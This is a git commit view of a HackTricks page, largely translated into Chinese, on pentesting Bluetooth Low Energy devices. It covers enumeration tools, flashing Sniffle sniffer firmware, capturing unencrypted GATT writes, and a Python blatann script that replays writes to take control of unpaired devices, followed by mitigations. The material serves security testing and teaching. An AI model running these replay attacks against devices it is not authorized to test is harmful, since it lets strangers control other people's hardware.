maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['', 'src/todo/radio-hacking/pentesting-ble-bluetooth-low-ene

Browse Source
This commit is contained in:
Translator 2025-08-28 14:32:34 +00:00
parent 0ccb74d55f
commit 6d62d007e1
1 changed files with 130 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

139
src/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md
View File

@ -1,24 +1,24 @@
# Pentesting BLE - Bluetooth Low Energy
# Pentesting BLE - 低功耗蓝牙
{{#include ../../banners/hacktricks-training.md}}
## 介绍
自 Bluetooth 4.0 规范发布以来BLE 仅使用 40 个频道,覆盖 2400 到 2483.5 MHz 的范围。相比之下,传统蓝牙在相同范围内使用 79 个频道。
自 Bluetooth 4.0 规范起可用BLE 只使用 40 个信道,覆盖 2400 到 2483.5 MHz 频段。相比之下,传统 Bluetooth 在相同频段使用 79 个信道。
BLE 设备通过发送 **advertising packets** (**beacons**) 进行通信,这些数据包向其他附近设备广播 BLE 设备的存在。这些信标有时也会 **发送数据**
BLE 设备通过发送 advertising packetsbeacons进行通信这些数据包将 BLE 设备的存在广播给附近的其他设备。这些 beacons 有时也会发送数据
监听设备,也称为中央设备,可以通过向广告设备发送特定的 **SCAN request** 来响应广告数据包。对该扫描的 **response** 使用与 **advertising** 数据包相同的结构,并包含无法在初始广告请求中容纳的附加信息,例如完整的设备名称。
监听设备(也称为 central device可以对 advertising packet 使用发送给特定广播设备的 SCAN request 进行响应。对该扫描的 response 使用与 advertising packet 相同的结构,附带最初 advertising 请求中放不下的额外信息,例如完整的设备名称。
![](<../../images/image (152).png>)
前导字节同步频率,而四字节访问地址是 **connection identifier**,用于多个设备尝试在同一频道上建立连接的场景。接下来,协议数据单元 (**PDU**) 包含 **advertising data**。PDU 有几种类型;最常用的是 ADV_NONCONN_IND 和 ADV_IND。如果设备 **不接受连接**,则使用 **ADV_NONCONN_IND** PDU 类型,仅在广告数据包中传输数据。如果设备 **允许连接**,并且在 **连接** 建立后 **停止发送广告** 数据包,则使用 **ADV_IND**
前导字节用于频率同步,而四字节的 access address 是一个 connection identifier用于多个设备在相同信道上尝试建立连接时区分对话。接下来Protocol Data UnitPDU包含 advertising data。PDU 有多种类型;最常用的是 ADV_NONCONN_IND 和 ADV_IND。如果设备不接受连接就会使用 ADV_NONCONN_IND PDU 类型,仅在 advertising packet 中传输数据。如果设备允许连接则使用 ADV_IND并在 connection 建立后停止发送 advertising packets
### GATT
**Generic Attribute Profile** (GATT) 定义了 **设备应如何格式化和传输数据**。当您分析 BLE 设备的攻击面时,您通常会将注意力集中在 GATT或 GATTs因为它是 **设备功能触发** 和数据存储、分组及修改的方式。GATT 以 16 位或 32 位值的表格形式列出设备的特性、描述符和服务。**特性**是 **在中央设备和外设之间发送的** **数据** 值。这些特性可以具有 **描述符**,以 **提供有关它们的附加信息**。如果 **特性** 与执行特定操作相关,通常会在 **服务****分组**
Generic Attribute ProfileGATT定义了设备应该如何格式化和传输数据。在分析 BLE 设备的攻击面时,你通常会将注意力集中在 GATT或 GATTs因为它是触发设备功能以及数据如何被存储、分组和修改的方式。GATT 以 16 位或 32 位值的表格列出设备的 characteristics、descriptors 和 services。characteristic 是 central device 与 peripheral 之间发送的数据值。这些 characteristics 可以有 descriptors提供关于它们的附加信息。如果相关联以执行特定动作characteristics 通常会被分组到 services 中。
## Enumeration
## 枚举
```bash
hciconfig #Check config, check if UP or DOWN
# If DOWN try:
@ -30,8 +30,8 @@ spooftooph -i hci0 -a 11:22:33:44:55:66
```
### GATTool
**GATTool** 允许 **建立** 与另一设备的 **连接**,列出该设备的 **特征**,并读取和写入其属性。\
GATTTool 可以使用 `-I` 选项启动交互式 shell
**GATTool** 允许 **建立** 另一设备的 **连接**,列出该设备的 **特征 (characteristics)**,并读取与写入其属性。\
GATTTool 可以使用 `-I` 选项 启动 交互式 shell:
```bash
gatttool -i hci0 -I
[ ][LE]> connect 24:62:AB:B1:A8:3E Attempting to connect to A4:CF:12:6C:B3:76 Connection successful
@ -64,4 +64,125 @@ sudo bettercap --eval "ble.recon on"
>> ble.write <MAC ADDR> <UUID> <HEX DATA>
>> ble.write <mac address of device> ff06 68656c6c6f # Write "hello" in ff06
```
## Sniffing 与 主动控制未配对的 BLE 设备
许多低成本的 BLE 外围设备并不强制执行 pairing/bonding。没有 bonding 时Link Layer encryption 永远不会启用,因此 ATT/GATT 流量为明文。一个 off-path sniffer 可以跟踪连接,解码 GATT 操作以获取 characteristic handles 和值,任何附近的主机随后都可以连接并重放这些写操作来控制设备。
### 使用 Sniffle 进行 Sniffing (CC26x2/CC1352)
硬件:一台 Sonoff Zigbee 3.0 USB Dongle Plus (CC26x2/CC1352),刷入 NCC Groups Sniffle firmware。
在 Linux 上安装 Sniffle 及其 Wireshark extcap
```bash
if [ ! -d /opt/sniffle/Sniffle-1.10.0/python_cli ]; then
echo "[+] - Sniffle not installed! Installing at 1.10.0..."
sudo mkdir -p /opt/sniffle
sudo chown -R $USER:$USER /opt/sniffle
pushd /opt/sniffle
wget https://github.com/nccgroup/Sniffle/archive/refs/tags/v1.10.0.tar.gz
tar xvf v1.10.0.tar.gz
# Install Wireshark extcap for user and root only
mkdir -p $HOME/.local/lib/wireshark/extcap
ln -s /opt/sniffle/Sniffle-1.10.0/python_cli/sniffle_extcap.py $HOME/.local/lib/wireshark/extcap
sudo mkdir -p /root/.local/lib/wireshark/extcap
sudo ln -s /opt/sniffle/Sniffle-1.10.0/python_cli/sniffle_extcap.py /root/.local/lib/wireshark/extcap
popd
else
echo "[+] - Sniffle already installed at 1.10.0"
fi
```
将 Sonoff 刷入 Sniffle firmware (确保你的串口设备匹配,例如 /dev/ttyUSB0):
```bash
pushd /opt/sniffle/
wget https://github.com/nccgroup/Sniffle/releases/download/v1.10.0/sniffle_cc1352p1_cc2652p1_1M.hex
git clone https://github.com/sultanqasim/cc2538-bsl.git
cd cc2538-bsl
python3 -m venv .venv
source .venv/bin/activate
python3 -m pip install pyserial intelhex
python3 cc2538-bsl.py -p /dev/ttyUSB0 --bootloader-sonoff-usb -ewv ../sniffle_cc1352p1_cc2652p1_1M.hex
deactivate
popd
```
通过 Sniffle extcap 在 Wireshark 中捕获,并通过过滤快速切换到会改变状态的写操作:
```text
_ws.col.info contains "Sent Write Command"
```
这突出了来自 client 的 ATT Write Commandshandle 和 value 常常直接映射到设备操作(例如,写入 0x01 到 buzzer/alert characteristic写入 0x00 停止)。
Sniffle CLI 快速示例:
```bash
python3 scanner.py --output scan.pcap
# Only devices with very strong signal
python3 scanner.py --rssi -40
# Filter advertisements containing a string
python3 sniffer.py --string "banana" --output sniff.pcap
```
Alternative sniffer: Nordics nRF Sniffer for BLE + Wireshark plugin also works. On small/cheap Nordic dongles you typically overwrite the USB bootloader to load the sniffer firmware, so you either keep a dedicated sniffer dongle or need a J-Link/JTAG to restore the bootloader later.
### 通过 GATT 进行主动控制
一旦你从嗅探到的流量中识别出可写的 characteristic handle 和 value就作为任意 central 连接并执行相同的写操作:
- 使用 Nordic nRF Connect for DesktopBLE app
- 选择 nRF52/nRF52840 dongle扫描并连接目标。
- 浏览 GATT 数据库,定位目标 characteristic通常有友好名称例如 Alert Level
- 使用嗅探到的字节执行 Write例如01 触发00 停止)。
- 在 Windows 上使用 Nordic dongle 通过 Python + blatann 自动化:
```python
import time
import blatann
# CONFIG
COM_PORT = "COM29" # Replace with your COM port
TARGET_MAC = "5B:B1:7F:47:A7:00" # Replace with your target MAC
target_address = blatann.peer.PeerAddress.from_string(TARGET_MAC + ",p")
# CONNECT
ble_device = blatann.BleDevice(COM_PORT)
ble_device.configure()
ble_device.open()
print(f"[-] Connecting to {TARGET_MAC}...")
peer = ble_device.connect(target_address).wait()
if not peer:
print("[!] Connection failed.")
ble_device.close()
raise SystemExit(1)
print("Connected. Discovering services...")
peer.discover_services().wait(5, exception_on_timeout=False)
# Example: write 0x01/0x00 to a known handle
for service in peer.database.services:
for ch in service.characteristics:
if ch.handle == 0x000b: # Replace with your handle
print("[!] Beeping.")
ch.write(b"\x01")
time.sleep(2)
print("[+] And relax.")
ch.write(b"\x00")
print("[-] Disconnecting...")
peer.disconnect()
peer.wait_for_disconnect()
ble_device.close()
```
### 操作注意事项和缓解措施
- 优先在 Linux 上使用 Sonoff+Sniffle以实现可靠的信道跳频和连接跟踪。准备一个备用的 Nordic sniffer 作为备份。
- 如果没有 pairing/bonding任何附近的攻击者都能观察到 writes并重放或伪造写入到未认证的可写 characteristics。
- 缓解措施:要求 pairing/bonding 并强制加密;将 characteristic permissions 设置为要求 authenticated writes尽量减少未认证的可写 characteristics使用 Sniffle/nRF Connect 验证 GATT ACLs。
## 参考资料
- [Start hacking Bluetooth Low Energy today! (part 2) Pentest Partners](https://www.pentestpartners.com/security-blog/start-hacking-bluetooth-low-energy-today-part-2/)
- [Sniffle A sniffer for Bluetooth 5 and 4.x LE](https://github.com/nccgroup/Sniffle)
- [Firmware installation for Sonoff USB Dongle (Sniffle README)](https://github.com/nccgroup/Sniffle?tab=readme-ov-file#firmware-installation-sonoff-usb-dongle)
- [Sonoff Zigbee 3.0 USB Dongle Plus (ZBDongle-P)](https://sonoff.tech/en-uk/products/sonoff-zigbee-3-0-usb-dongle-plus-zbdongle-p)
- [Nordic nRF Sniffer for Bluetooth LE](https://www.nordicsemi.com/Products/Development-tools/nRF-Sniffer-for-Bluetooth-LE)
- [nRF Connect for Desktop](https://www.nordicsemi.com/Products/Development-tools/nRF-Connect-for-desktop)
- [blatann Python BLE library for Nordic devices](https://blatann.readthedocs.io/en/latest/)
{{#include ../../banners/hacktricks-training.md}}